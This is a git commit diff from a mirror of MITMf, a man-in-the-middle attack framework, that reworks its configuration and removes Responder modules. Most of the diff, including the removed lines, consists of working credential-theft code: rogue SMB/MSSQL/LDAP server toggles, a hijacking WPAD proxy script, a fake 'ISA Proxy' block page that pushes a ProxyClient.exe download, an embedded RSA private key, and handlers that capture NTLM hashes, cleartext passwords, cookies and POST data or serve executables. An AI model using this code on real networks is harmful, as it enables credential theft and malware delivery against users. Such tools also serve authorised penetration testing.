mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-16 10:03:52 -07:00
All plugins are now modified to support dynamic config file changes
Responder functionality fully restored
This commit is contained in:
parent
dfa9c9d65e
commit
70ec5a2bbc
50 changed files with 2102 additions and 798 deletions
|
@ -21,6 +21,10 @@
|
||||||
msfport = 8080 #Port to start webserver for exploits
|
msfport = 8080 #Port to start webserver for exploits
|
||||||
rpcip = 127.0.0.1
|
rpcip = 127.0.0.1
|
||||||
rpcpass = abc123
|
rpcpass = abc123
|
||||||
|
|
||||||
|
[[SMB]]
|
||||||
|
#Set a custom challenge
|
||||||
|
Challenge = 1122334455667788
|
||||||
|
|
||||||
[[DNS]]
|
[[DNS]]
|
||||||
|
|
||||||
|
@ -88,46 +92,32 @@
|
||||||
[Responder]
|
[Responder]
|
||||||
|
|
||||||
#Set these values to On or Off, so you can control which rogue authentication server is turned on.
|
#Set these values to On or Off, so you can control which rogue authentication server is turned on.
|
||||||
SQL = On
|
MSSQL = On
|
||||||
SMB = On
|
|
||||||
Kerberos = On
|
Kerberos = On
|
||||||
FTP = On
|
FTP = On
|
||||||
POP = On
|
POP = On
|
||||||
##Listen on 25/TCP, 587/TCP
|
SMTP = On #Listens on 25/TCP, 587/TCP
|
||||||
SMTP = On
|
IMAP = On
|
||||||
IMAP = On
|
LDAP = On
|
||||||
HTTP = On
|
|
||||||
HTTPS = On
|
|
||||||
LDAP = On
|
|
||||||
|
|
||||||
#Set a custom challenge
|
#Set this option with your in-scope targets (default = All)
|
||||||
Challenge = 1122334455667788
|
#Ex. RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
||||||
|
|
||||||
#Set this to change the default logging file
|
|
||||||
SessionLog = Responder-Session.log
|
|
||||||
|
|
||||||
#Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
|
||||||
#RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
|
||||||
RespondTo =
|
RespondTo =
|
||||||
#Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
|
|
||||||
#RespondTo = WPAD,DEV,PROD,SQLINT
|
#Set this option with specific NBT-NS/LLMNR names to answer to (default = All)
|
||||||
|
#Ex. RespondTo = WPAD,DEV,PROD,SQLINT
|
||||||
RespondToName =
|
RespondToName =
|
||||||
|
|
||||||
#DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
#DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
||||||
DontRespondTo =
|
DontRespondTo =
|
||||||
#Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
|
|
||||||
|
#Set this option with specific NBT-NS/LLMNR names not to respond to (default = None)
|
||||||
|
#Ex. DontRespondTo = NAC, IPS, IDS
|
||||||
DontRespondToName =
|
DontRespondToName =
|
||||||
|
|
||||||
#Set your custom PAC script
|
#Set your custom PAC script
|
||||||
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
|
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
|
||||||
|
|
||||||
[[HTTPS Server]]
|
|
||||||
|
|
||||||
#Change to use your certs
|
|
||||||
cert = config/responder/certs/responder.crt
|
|
||||||
key = config/responder/certs/responder.key
|
|
||||||
|
|
||||||
|
|
||||||
[BeEFAutorun]
|
[BeEFAutorun]
|
||||||
#Example config for the BeefAutorun plugin
|
#Example config for the BeefAutorun plugin
|
||||||
|
|
||||||
|
|
|
@ -1,31 +0,0 @@
|
||||||
<html>
|
|
||||||
<head>
|
|
||||||
<title>Website Blocked: ISA Proxy Server</title>
|
|
||||||
<style>
|
|
||||||
<!--
|
|
||||||
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
|
|
||||||
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
|
|
||||||
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
|
|
||||||
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
|
|
||||||
.details li { list-style: none; padding: 4px 0;}
|
|
||||||
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
|
|
||||||
-->
|
|
||||||
</style>
|
|
||||||
|
|
||||||
</head>
|
|
||||||
<body>
|
|
||||||
<center>
|
|
||||||
<div class="content blocking">
|
|
||||||
<div class="title" id="msg_title"><b>New Security Policy: Website Blocked</b></div>
|
|
||||||
<ul class="details">
|
|
||||||
<div id="main_block">
|
|
||||||
<div id="msg_long_reason">
|
|
||||||
<li><b>Access has been blocked. Please download and install the new </b><span class="url"><a href="http://isaProxysrv/ProxyClient.exe"><b>Proxy Client</b></a></span><b> in order to access internet resources.</b></li>
|
|
||||||
</div>
|
|
||||||
</ul>
|
|
||||||
</div>
|
|
||||||
<div class="footer">ISA Security <b>Proxy Server</b></div>
|
|
||||||
</center>
|
|
||||||
</body>
|
|
||||||
</html>
|
|
||||||
|
|
Binary file not shown.
|
@ -1,2 +0,0 @@
|
||||||
#!/bin/bash
|
|
||||||
openssl genrsa -des3 -out responder.tmp.key 2048&&openssl rsa -in responder.tmp.key -out responder.key&&openssl req -new -key responder.key -out responder.csr&&openssl x509 -req -days 365 -in responder.csr -signkey responder.key -out responder.crt&&rm responder.tmp.key responder.csr
|
|
|
@ -1,19 +0,0 @@
|
||||||
-----BEGIN CERTIFICATE-----
|
|
||||||
MIIDBjCCAe4CCQDDe8Sb2PGjITANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB
|
|
||||||
VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
|
|
||||||
cyBQdHkgTHRkMB4XDTEzMDIyODIwMTcxN1oXDTE0MDIyODIwMTcxN1owRTELMAkG
|
|
||||||
A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
|
|
||||||
IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
|
|
||||||
AMQB5yErm0Sg7sRQbLgbi/hG/8uF2xUzvVKnT4LROEWkkimy9umb2JbvAZITDvSs
|
|
||||||
r2xsPA4VoxFjKpWLOv7mAIMBR95NDWsTLuR36Sho/U2LlTlUBdSfQP7rlKQZ0L43
|
|
||||||
YpXswdvCCJ0wP2yOhq0i71cg/Nk9mfQxftpgGUxoa+6ljU9hSdmThu2FVgAbSpNl
|
|
||||||
D86rk4K9/sGYAY4btMqaMzC7JIKZp07FHL32oM01cKbRoNg2eUuQmoVjca1pkmbO
|
|
||||||
Y8qnl7ajOjsiAPQnt/2TMJlRsdoU1fSx76Grgkm8D4gX/pBUqELdpvHtnm/9imPl
|
|
||||||
qNGL5LaW8ARgG16U0mRhutkCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAS7u4LWc9
|
|
||||||
wDPThD0o58Ti2GgIs+mMRx5hPaxWHJNCu+lwFqjvWmsNFfHoSzlIkIUjtlV2G/wE
|
|
||||||
FxDSPlc/V+r7U2UiE7WSqQiWdmfOYS2m03x4SN0Vzf/n9DeApyPo2GsXGrha20eN
|
|
||||||
s390Xwj6yKFdprUPJ8ezlEVRrAMv7tu1cOLzqmkocYKnPgXDdQxiiGisp7/hEUCQ
|
|
||||||
B7HvNCMPbOi+M7O/CXbfgnTD029KkyiR2LEtj4QC5Ytp/pj0UyyoIeCK57CTB3Jt
|
|
||||||
X3CZ+DiphTpOca4iENH55m6atk+WHYwg3ClYiONQDdIgKVT3BK0ITjyFWZeTneVu
|
|
||||||
1eVgF/UkX9fqJg==
|
|
||||||
-----END CERTIFICATE-----
|
|
|
@ -1,27 +0,0 @@
|
||||||
-----BEGIN RSA PRIVATE KEY-----
|
|
||||||
MIIEowIBAAKCAQEAxAHnISubRKDuxFBsuBuL+Eb/y4XbFTO9UqdPgtE4RaSSKbL2
|
|
||||||
6ZvYlu8BkhMO9KyvbGw8DhWjEWMqlYs6/uYAgwFH3k0NaxMu5HfpKGj9TYuVOVQF
|
|
||||||
1J9A/uuUpBnQvjdilezB28IInTA/bI6GrSLvVyD82T2Z9DF+2mAZTGhr7qWNT2FJ
|
|
||||||
2ZOG7YVWABtKk2UPzquTgr3+wZgBjhu0ypozMLskgpmnTsUcvfagzTVwptGg2DZ5
|
|
||||||
S5CahWNxrWmSZs5jyqeXtqM6OyIA9Ce3/ZMwmVGx2hTV9LHvoauCSbwPiBf+kFSo
|
|
||||||
Qt2m8e2eb/2KY+Wo0YvktpbwBGAbXpTSZGG62QIDAQABAoIBABbuLg74XgLKXQSE
|
|
||||||
cCOdvWM/Ux+JOlchpW1s+2VPeqjTFvJf6Hjt7YnCzkk7h41iQmeJxgDT0S7wjgPO
|
|
||||||
tQkq+TZaSQEdvIshRGQgDxvWJIQU51E8ni4Ar4bjIpGMH5qROixV9VvzODTDdzgI
|
|
||||||
+IJ6ystDpbD4fvFNdQyxH2SL9syFRyWyxY3vWB0C/OHWxGFtiTtmeivBSmpxl0RY
|
|
||||||
RQqPLxX+xUCie7U6ud3e37FO7cKt+YT8lWKhGHKJlTlJbHs1d8crzp6qKJLl+ibB
|
|
||||||
0fB6D6E5M1fnIJFJULIYAG5bEak90KuKOKCLoKLG+rq0vUvJsb9vNCAA6rh1ra+n
|
|
||||||
8woY8TECgYEA7CEE/3oWnziB3PZoIIJDgbBalCCbA+/SgDiSvYJELEApCMj8HYc5
|
|
||||||
UGOxrfVhPmbHRUI982Fj1oM3QBEX0zpkOk7Xk224RXwBHG8MMPQmTMVp+o06AI6D
|
|
||||||
Nggyam9v5KLNMj5KghKJSOD0tR5YxsZPXw4gAI+wpqu3bXGKZ8bRpvUCgYEA1ICJ
|
|
||||||
H+kw6H8edJHGdNH+X6RR0DIbS11XQvbKQ3vh6LdHTofoHqQa3t0zGYCgksKJbtHV
|
|
||||||
2h3pv+nuOu5FEP2rrGJIforv2zwfJ5vp65jePrSXU+Up4pMHbP1Rm91ApcKNA15U
|
|
||||||
q3SaclqTjmiqvaeSKc4TDjdb/rUaIhyIgbg97dUCgYAcdq5/jVwEvW8KD7nlkU5J
|
|
||||||
59RDXtrQ0qvxQOCPb5CANQu9P10EwjQqeJoGejnKp+EFfEKzf93lEdQrKORSVguW
|
|
||||||
68IYx3UbCyOnJcu2avfi8TkhNrzzLDqs3LgXFG/Mg8NwdwnMPCfIXTWiT5IsA+O1
|
|
||||||
daJt7uRAcxqdWr5wXAsRsQKBgFXU4Q4hm16dUcjVxKoU08D/1wfX5UxolEF4+zOM
|
|
||||||
yy+7L7MZk/kkYbIY+HXZjYIZz3cSjGVAZdTdgRsOeJknTPsg65UpOz57Jz5RbId7
|
|
||||||
xHDhcqoxSty4dGxiWV8yW9VYIqr0pBBo1aVQzn7b6fMWxyPZl7rLQ3462iZjDgQP
|
|
||||||
TfxNAoGBAK/Gef6MgchbFPikOVEX9qB/wt4sS3V7mT6QkqMZZgSkegDLBFVRJX3w
|
|
||||||
Emx/V2A14p0uHPzn5irURyJ6daZCN4amPAWYQnkiXG8saiBwtfs23A1q7kxnPR+b
|
|
||||||
KJfb+nDlhU1iYa/7nf4PaR/i9l6gcwOeh1ThK1nq4VvwTaTZKSRh
|
|
||||||
-----END RSA PRIVATE KEY-----
|
|
|
@ -13,9 +13,7 @@ class ConfigWatcher(FileSystemEventHandler):
|
||||||
|
|
||||||
_instance = None
|
_instance = None
|
||||||
|
|
||||||
def __init__(self):
|
config = ConfigObj("./config/mitmf.conf")
|
||||||
|
|
||||||
self.config = ConfigObj("./config/mitmf.conf")
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def getInstance():
|
def getInstance():
|
||||||
|
|
|
@ -416,6 +416,7 @@ class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
|
||||||
class DNSChef(ConfigWatcher):
|
class DNSChef(ConfigWatcher):
|
||||||
|
|
||||||
_instance = None
|
_instance = None
|
||||||
|
version = "0.4"
|
||||||
|
|
||||||
tcp = False
|
tcp = False
|
||||||
ipv6 = False
|
ipv6 = False
|
||||||
|
|
|
@ -45,6 +45,8 @@ http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|co
|
||||||
|
|
||||||
class NetCreds:
|
class NetCreds:
|
||||||
|
|
||||||
|
version = "1.0"
|
||||||
|
|
||||||
def sniffer(self, myip, interface):
|
def sniffer(self, myip, interface):
|
||||||
#set the filter to our ip to prevent capturing traffic coming/going from our box
|
#set the filter to our ip to prevent capturing traffic coming/going from our box
|
||||||
sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(myip), store=0)
|
sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(myip), store=0)
|
||||||
|
|
|
@ -1,240 +0,0 @@
|
||||||
##################################################################################
|
|
||||||
#HTTP Proxy Stuff starts here (Not Used)
|
|
||||||
##################################################################################
|
|
||||||
|
|
||||||
class HTTPProxy():
|
|
||||||
|
|
||||||
def serve_thread_tcp(host, port, handler):
|
|
||||||
try:
|
|
||||||
server = ThreadingTCPServer((host, port), handler)
|
|
||||||
server.serve_forever()
|
|
||||||
except Exception, e:
|
|
||||||
print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
|
|
||||||
|
|
||||||
def start(on_off):
|
|
||||||
if on_off == "ON":
|
|
||||||
t = threading.Thread(name="HTTP", target=self.serve_thread_tcp, args=("0.0.0.0", 80,HTTP))
|
|
||||||
t.setDaemon(True)
|
|
||||||
t.start()
|
|
||||||
|
|
||||||
if on_off == "OFF":
|
|
||||||
return False
|
|
||||||
|
|
||||||
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
|
||||||
|
|
||||||
allow_reuse_address = 1
|
|
||||||
|
|
||||||
def server_bind(self):
|
|
||||||
TCPServer.server_bind(self)
|
|
||||||
|
|
||||||
#Parse NTLMv1/v2 hash.
|
|
||||||
def ParseHTTPHash(data,client):
|
|
||||||
LMhashLen = struct.unpack('<H',data[12:14])[0]
|
|
||||||
LMhashOffset = struct.unpack('<H',data[16:18])[0]
|
|
||||||
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
|
||||||
NthashLen = struct.unpack('<H',data[20:22])[0]
|
|
||||||
NthashOffset = struct.unpack('<H',data[24:26])[0]
|
|
||||||
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
||||||
if NthashLen == 24:
|
|
||||||
NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
||||||
HostNameLen = struct.unpack('<H',data[46:48])[0]
|
|
||||||
HostNameOffset = struct.unpack('<H',data[48:50])[0]
|
|
||||||
Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
|
|
||||||
UserLen = struct.unpack('<H',data[36:38])[0]
|
|
||||||
UserOffset = struct.unpack('<H',data[40:42])[0]
|
|
||||||
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
||||||
outfile = "./logs/responder/HTTP-NTLMv1-Client-"+client+".txt"
|
|
||||||
WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
|
|
||||||
WriteData(outfile,WriteHash, User+"::"+Hostname)
|
|
||||||
responder_logger.info('[+]HTTP NTLMv1 hash captured from :%s'%(client))
|
|
||||||
responder_logger.info('[+]HTTP NTLMv1 Hostname is :%s'%(Hostname))
|
|
||||||
responder_logger.info('[+]HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
|
|
||||||
responder_logger.info('[+]HTTP NTLMv1 Complete hash is :%s'%(WriteHash))
|
|
||||||
|
|
||||||
if NthashLen > 24:
|
|
||||||
NthashLen = 64
|
|
||||||
DomainLen = struct.unpack('<H',data[28:30])[0]
|
|
||||||
DomainOffset = struct.unpack('<H',data[32:34])[0]
|
|
||||||
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
|
||||||
UserLen = struct.unpack('<H',data[36:38])[0]
|
|
||||||
UserOffset = struct.unpack('<H',data[40:42])[0]
|
|
||||||
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
||||||
HostNameLen = struct.unpack('<H',data[44:46])[0]
|
|
||||||
HostNameOffset = struct.unpack('<H',data[48:50])[0]
|
|
||||||
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
|
|
||||||
outfile = "./logs/responder/HTTP-NTLMv2-Client-"+client+".txt"
|
|
||||||
WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
|
|
||||||
WriteData(outfile,WriteHash, User+"::"+Domain)
|
|
||||||
responder_logger.info('[+]HTTP NTLMv2 hash captured from :%s'%(client))
|
|
||||||
responder_logger.info('[+]HTTP NTLMv2 User is : %s'%(User))
|
|
||||||
responder_logger.info('[+]HTTP NTLMv2 Domain is :%s'%(Domain))
|
|
||||||
responder_logger.info('[+]HTTP NTLMv2 Hostname is :%s'%(HostName))
|
|
||||||
responder_logger.info('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash))
|
|
||||||
|
|
||||||
def GrabCookie(data,host):
|
|
||||||
Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data)
|
|
||||||
if Cookie:
|
|
||||||
CookieStr = "[+]HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0))
|
|
||||||
responder_logger.info(CookieStr)
|
|
||||||
return Cookie.group(0)
|
|
||||||
else:
|
|
||||||
NoCookies = "No cookies were sent with this request"
|
|
||||||
responder_logger.info(NoCookies)
|
|
||||||
return NoCookies
|
|
||||||
|
|
||||||
def WpadCustom(data,client):
|
|
||||||
Wpad = re.search('(/wpad.dat|/*\.pac)', data)
|
|
||||||
if Wpad:
|
|
||||||
buffer1 = WPADScript(Payload=WPAD_Script)
|
|
||||||
buffer1.calculate()
|
|
||||||
return str(buffer1)
|
|
||||||
else:
|
|
||||||
return False
|
|
||||||
|
|
||||||
def WpadForcedAuth(Force_WPAD_Auth):
|
|
||||||
if Force_WPAD_Auth == True:
|
|
||||||
return True
|
|
||||||
if Force_WPAD_Auth == False:
|
|
||||||
return False
|
|
||||||
|
|
||||||
# Function used to check if we answer with a Basic or NTLM auth.
|
|
||||||
def Basic_Ntlm(Basic):
|
|
||||||
if Basic == True:
|
|
||||||
return IIS_Basic_401_Ans()
|
|
||||||
else:
|
|
||||||
return IIS_Auth_401_Ans()
|
|
||||||
|
|
||||||
def ServeEXE(data,client, Filename):
|
|
||||||
Message = "[+]Sent %s file sent to: %s."%(Filename,client)
|
|
||||||
responder_logger.info(Message)
|
|
||||||
with open (Filename, "rb") as bk:
|
|
||||||
data = bk.read()
|
|
||||||
bk.close()
|
|
||||||
return data
|
|
||||||
|
|
||||||
def ServeEXEOrNot(on_off):
|
|
||||||
if Exe_On_Off == "ON":
|
|
||||||
return True
|
|
||||||
if Exe_On_Off == "OFF":
|
|
||||||
return False
|
|
||||||
|
|
||||||
def ServeEXECAlwaysOrNot(on_off):
|
|
||||||
if Exec_Mode_On_Off == "ON":
|
|
||||||
return True
|
|
||||||
if Exec_Mode_On_Off == "OFF":
|
|
||||||
return False
|
|
||||||
|
|
||||||
def IsExecutable(Filename):
|
|
||||||
exe = re.findall('.exe',Filename)
|
|
||||||
if exe:
|
|
||||||
return True
|
|
||||||
else:
|
|
||||||
return False
|
|
||||||
|
|
||||||
def GrabURL(data, host):
|
|
||||||
GET = re.findall('(?<=GET )[^HTTP]*', data)
|
|
||||||
POST = re.findall('(?<=POST )[^HTTP]*', data)
|
|
||||||
POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
|
|
||||||
if GET:
|
|
||||||
HostStr = "[+]HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET))
|
|
||||||
responder_logger.info(HostStr)
|
|
||||||
#print HostStr
|
|
||||||
|
|
||||||
if POST:
|
|
||||||
Host3Str = "[+]HTTP POST request from : %s. The HTTP URL requested was: %s"%(host,''.join(POST))
|
|
||||||
responder_logger.info(Host3Str)
|
|
||||||
#print Host3Str
|
|
||||||
if len(''.join(POSTDATA)) >2:
|
|
||||||
PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip())
|
|
||||||
#print PostData
|
|
||||||
responder_logger.info(PostData)
|
|
||||||
|
|
||||||
#Handle HTTP packet sequence.
|
|
||||||
def PacketSequence(data,client):
|
|
||||||
Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
|
|
||||||
BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
|
|
||||||
|
|
||||||
if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
|
|
||||||
File = config.get('HTTP Server', 'ExecFilename')
|
|
||||||
buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File)
|
|
||||||
buffer1.calculate()
|
|
||||||
return str(buffer1)
|
|
||||||
|
|
||||||
if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
|
|
||||||
if IsExecutable(FILENAME):
|
|
||||||
buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
|
|
||||||
buffer1.calculate()
|
|
||||||
return str(buffer1)
|
|
||||||
else:
|
|
||||||
buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
|
|
||||||
buffer1.calculate()
|
|
||||||
return str(buffer1)
|
|
||||||
|
|
||||||
if Ntlm:
|
|
||||||
packetNtlm = b64decode(''.join(Ntlm))[8:9]
|
|
||||||
if packetNtlm == "\x01":
|
|
||||||
GrabURL(data,client)
|
|
||||||
GrabCookie(data,client)
|
|
||||||
r = NTLM_Challenge(ServerChallenge=Challenge)
|
|
||||||
r.calculate()
|
|
||||||
t = IIS_NTLM_Challenge_Ans()
|
|
||||||
t.calculate(str(r))
|
|
||||||
buffer1 = str(t)
|
|
||||||
return buffer1
|
|
||||||
if packetNtlm == "\x03":
|
|
||||||
NTLM_Auth= b64decode(''.join(Ntlm))
|
|
||||||
ParseHTTPHash(NTLM_Auth,client)
|
|
||||||
if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
|
|
||||||
Message = "[+]WPAD (auth) file sent to: %s"%(client)
|
|
||||||
if Verbose:
|
|
||||||
print Message
|
|
||||||
responder_logger.info(Message)
|
|
||||||
buffer1 = WpadCustom(data,client)
|
|
||||||
return buffer1
|
|
||||||
else:
|
|
||||||
buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
|
|
||||||
buffer1.calculate()
|
|
||||||
return str(buffer1)
|
|
||||||
|
|
||||||
if BasicAuth:
|
|
||||||
GrabCookie(data,client)
|
|
||||||
GrabURL(data,client)
|
|
||||||
outfile = "./logs/responder/HTTP-Clear-Text-Password-"+client+".txt"
|
|
||||||
WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth)))
|
|
||||||
responder_logger.info('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth))))
|
|
||||||
if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
|
|
||||||
Message = "[+]WPAD (auth) file sent to: %s"%(client)
|
|
||||||
if Verbose:
|
|
||||||
print Message
|
|
||||||
responder_logger.info(Message)
|
|
||||||
buffer1 = WpadCustom(data,client)
|
|
||||||
return buffer1
|
|
||||||
else:
|
|
||||||
buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
|
|
||||||
buffer1.calculate()
|
|
||||||
return str(buffer1)
|
|
||||||
|
|
||||||
else:
|
|
||||||
return str(Basic_Ntlm(Basic))
|
|
||||||
|
|
||||||
#HTTP Server Class
|
|
||||||
class HTTP(BaseRequestHandler):
|
|
||||||
|
|
||||||
def handle(self):
|
|
||||||
try:
|
|
||||||
while True:
|
|
||||||
self.request.settimeout(1)
|
|
||||||
data = self.request.recv(8092)
|
|
||||||
buff = WpadCustom(data,self.client_address[0])
|
|
||||||
if buff and WpadForcedAuth(Force_WPAD_Auth) == False:
|
|
||||||
Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0])
|
|
||||||
if Verbose:
|
|
||||||
print Message
|
|
||||||
responder_logger.info(Message)
|
|
||||||
self.request.send(buff)
|
|
||||||
else:
|
|
||||||
buffer0 = PacketSequence(data,self.client_address[0])
|
|
||||||
self.request.send(buffer0)
|
|
||||||
except Exception:
|
|
||||||
pass#No need to be verbose..
|
|
||||||
|
|
|
@ -1,128 +0,0 @@
|
||||||
import struct
|
|
||||||
|
|
||||||
class MSSQLServer():
|
|
||||||
|
|
||||||
def serve_thread_tcp(host, port, handler):
|
|
||||||
try:
|
|
||||||
server = ThreadingTCPServer((host, port), handler)
|
|
||||||
server.serve_forever()
|
|
||||||
except Exception, e:
|
|
||||||
print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
|
|
||||||
|
|
||||||
def start(SQL_On_Off):
|
|
||||||
if SQL_On_Off == "ON":
|
|
||||||
t = threading.Thread(name="MSSQL", target=self.serve_thread_tcp, args=("0.0.0.0", 1433,MSSQL))
|
|
||||||
t.setDaemon(True)
|
|
||||||
t.start()
|
|
||||||
return t
|
|
||||||
if SQL_On_Off == "OFF":
|
|
||||||
return False
|
|
||||||
|
|
||||||
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
|
||||||
|
|
||||||
allow_reuse_address = True
|
|
||||||
|
|
||||||
def server_bind(self):
|
|
||||||
TCPServer.server_bind(self)
|
|
||||||
|
|
||||||
#This function parse SQL NTLMv1/v2 hash and dump it into a specific file.
|
|
||||||
def ParseSQLHash(data,client):
|
|
||||||
SSPIStart = data[8:]
|
|
||||||
LMhashLen = struct.unpack('<H',data[20:22])[0]
|
|
||||||
LMhashOffset = struct.unpack('<H',data[24:26])[0]
|
|
||||||
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
|
||||||
NthashLen = struct.unpack('<H',data[30:32])[0]
|
|
||||||
if NthashLen == 24:
|
|
||||||
NthashOffset = struct.unpack('<H',data[32:34])[0]
|
|
||||||
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
||||||
DomainLen = struct.unpack('<H',data[36:38])[0]
|
|
||||||
DomainOffset = struct.unpack('<H',data[40:42])[0]
|
|
||||||
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
|
||||||
UserLen = struct.unpack('<H',data[44:46])[0]
|
|
||||||
UserOffset = struct.unpack('<H',data[48:50])[0]
|
|
||||||
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
||||||
outfile = "./logs/responder/MSSQL-NTLMv1-Client-"+client+".txt"
|
|
||||||
WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal, User+"::"+Domain)
|
|
||||||
responder_logger.info('[+]MsSQL NTLMv1 hash captured from :%s'%(client))
|
|
||||||
responder_logger.info('[+]MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
|
|
||||||
responder_logger.info('[+]MSSQL NTLMv1 Domain is :%s'%(Domain))
|
|
||||||
responder_logger.info('[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal))
|
|
||||||
if NthashLen > 60:
|
|
||||||
DomainLen = struct.unpack('<H',data[36:38])[0]
|
|
||||||
NthashOffset = struct.unpack('<H',data[32:34])[0]
|
|
||||||
NthashLen = struct.unpack('<H',data[30:32])[0]
|
|
||||||
Hash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
||||||
DomainOffset = struct.unpack('<H',data[40:42])[0]
|
|
||||||
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
|
||||||
UserLen = struct.unpack('<H',data[44:46])[0]
|
|
||||||
UserOffset = struct.unpack('<H',data[48:50])[0]
|
|
||||||
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
||||||
outfile = "./logs/responder/MSSQL-NTLMv2-Client-"+client+".txt"
|
|
||||||
Writehash = User+"::"+Domain+":"+NumChal+":"+Hash[:32].upper()+":"+Hash[32:].upper()
|
|
||||||
WriteData(outfile,Writehash,User+"::"+Domain)
|
|
||||||
responder_logger.info('[+]MsSQL NTLMv2 hash captured from :%s'%(client))
|
|
||||||
responder_logger.info('[+]MSSQL NTLMv2 Domain is :%s'%(Domain))
|
|
||||||
responder_logger.info('[+]MSSQL NTLMv2 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
|
|
||||||
responder_logger.info('[+]MSSQL NTLMv2 Complete Hash is : %s'%(Writehash))
|
|
||||||
|
|
||||||
def ParseSqlClearTxtPwd(Pwd):
|
|
||||||
Pwd = map(ord,Pwd.replace('\xa5',''))
|
|
||||||
Pw = []
|
|
||||||
